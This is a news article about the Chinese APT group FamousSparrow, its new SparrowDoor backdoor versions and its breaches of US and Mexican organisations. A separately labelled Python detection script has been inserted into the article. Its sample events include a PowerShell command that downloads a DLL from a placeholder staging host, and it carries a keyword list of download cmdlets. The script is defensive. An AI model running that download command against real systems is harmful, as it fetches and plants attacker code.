China’s FamousSparrow flies back, breaches US org • The Register

03/27/2025


The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.

Plus, according to ESET researchers who spotted the activity, the Beijing-backed snoops developed two new versions of their custom SparrowDoor backdoor during what appeared to be a quiet stretch between 2022 and 2024.

ESET first documented FamousSparrow after uncovering its bespoke malware on hotel and government networks around the world – though the crew had likely been active since at least 2019.

After a long public silence, the Chinese gang appears to be back in action. The security shop noticed the crew’s resurgence while assisting a US trade group recovering from an attack in July 2024.

“While helping the affected entity remediate the compromise, we made an unexpected discovery in the victim’s network: Malicious tools belonging to FamousSparrow, a China-aligned APT [advanced persistent threat] group,” ESET malware researcher Alexandre Côté Cyr said in a Wednesday report.

Specifically, ESET found two previously undocumented versions of the group’s flagship remote-control backdoor, SparrowDoor, which appears to be exclusive to the group. The researchers also documented FamousSparrow using ShadowPad, a privately sold backdoor believed to be available only to China-aligned attackers.

As the investigation continued, the threat hunters discovered that FamousSparrow had also breached the IT security of a research org in Mexico just days before the US intrusion. 

Cyr noted ESET is probing additional espionage activity that it believes to be connected to the group that occurred between 2022 and 2024, including a governmental institution in Honduras.

Despite Microsoft Threat Intelligence reportedly linking FamousSparrow to Salt Typhoon – the Chinese spy group that famously compromised at least nine US telecommunications companies and government networks late last year – “FamousSparrow appears to be its own distinct cluster,” Cyr wrote.

While it does share “loose links” with Salt Typhoon (Trend Micro tracks this group as Earth Estries) and other Chinese government-backed snoops, “we believe those links are better explained by positing the existence of a shared third party, such as a digital quartermaster, than by conflating all of these disparate clusters of activity into one,” he said.

In the observed attacks, FamousSparrow gained access to the organizations’ networks after using an unknown exploit to deploy a webshell backdoor on an Internet Information Services (IIS) web server. Both victims, according to ESET, were running outdated versions of Windows Server and Microsoft Exchange.

After breaking in, the spies established remote PowerShell sessions and downloaded three files from the same server hosting FamousSparrow’s so-called trident loader, which were ultimately used to run the crew’s SparrowDoor malware on compromised boxes.
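As an added example, not code from ESET's report or the article, the following Python triage script applies the chain described above (an IIS webshell, then remote PowerShell sessions that download files) to process-creation logs. The events, field names and host name are constructed; treating wsmprovhost.exe as the PowerShell-remoting host process is an assumption about the environment, not something the article states.

```python
"""Detection sketch: flag process-creation events matching the reported
intrusion chain (IIS webshell -> remote PowerShell -> file downloads).
Records are constructed, Sysmon-Event-1-like dictionaries; field names and
sample values are assumptions, not data from ESET's report."""
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Parents that should not normally launch a shell: the IIS worker process
# (a webshell's host) and the WinRM/PowerShell-remoting host (assumed name).
SUSPICIOUS_PARENTS = {"w3wp.exe": "iis_worker_spawned_shell",
                      "wsmprovhost.exe": "remote_ps_session_spawned_shell"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "iwr ", "start-bitstransfer")

def basename(path):
    return ntpath.basename(path).lower()

def classify(event):
    """Return the list of rule tags one event matches (empty if benign)."""
    tags = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    if image in SHELLS and parent in SUSPICIOUS_PARENTS:
        tags.append(SUSPICIOUS_PARENTS[parent])
    if image in SHELLS and any(m in cmd for m in DOWNLOAD_MARKERS):
        tags.append("shell_download_cmdlet")
    return tags

def scan(events):
    """Return (event, tags) pairs for every event matching at least one rule."""
    return [(e, t) for e in events if (t := classify(e))]

# Constructed sample events for a local dry run (host name is a placeholder).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"(New-Object Net.WebClient).DownloadFile("
                    "'http://STAGING-HOST-PLACEHOLDER/a.dll','C:\\ProgramData\\a.dll')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for event, tags in scan(SAMPLE_EVENTS):
        print(tags, event["CommandLine"])
```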

Both versions of the custom backdoor seen by ESET contain “considerable advances in code quality and architecture compared to older ones,” according to Cyr. The first variant added more supported commands, which would be issued from a remote control server, and also parallelized its tasks with multi-threading.

The second version of SparrowDoor that ESET spotted in this campaign was modular, in that it supported commands for running plugins and some of its functionality had been moved into these separate modules.

Both of these new versions contain “significant code overlaps” with the older SparrowDoor, Cyr wrote.

Additionally, after deploying SparrowDoor on the US victim’s network, the spies used it to execute a ShadowPad loader that Cisco Talos has previously observed being used by another Chinese government group, APT41 (aka Wicked Panda). This malware enables remote control, file transfers, and deeper access into compromised systems.

ESET detected ShadowPad “on several machines” in the compromised network and said it’s the first time they’ve seen FamousSparrow using this malware. ®
